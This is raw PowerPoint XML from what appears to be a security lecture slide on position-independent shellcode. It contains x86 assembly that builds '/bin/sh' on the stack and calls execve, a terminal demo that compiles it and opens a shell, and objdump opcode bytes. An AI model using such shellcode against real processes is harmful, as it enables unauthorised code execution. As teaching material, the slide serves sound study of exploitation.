            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	# push /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\0	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	push 	$0x0068732F	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	# push /bin	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	push	$0x6E69622F	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</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ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	push 	$0	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	push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ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>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ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$0,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(char* filename, char** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$1,%eax	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>     	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$0,%ebx	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$0x80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>200</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2974694" y="1258488"/>
            <a:ext cx="6269373" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>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ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> –m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>position_independent_shellcode.s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] $./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh-41.$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208872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Position Independent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="208345" y="1600201"/>
            <a:ext cx="8935656" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -m32 -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>position_independent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>position_independent_shellcode.s</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> –D ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>position_independent</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>08048394 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048394:       b8 0b 00 00 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0xb,%eax </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048399:       68 2f 73 68 00          push   $0x68732f </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>804839e:       68 2f 62 69 6e          push   $0x6e69622f </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483a3:       89 e3                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483a5:       6a 00                   push   $0x0 </a:t>
            </a:r>
          </a:p>
          <a:p>
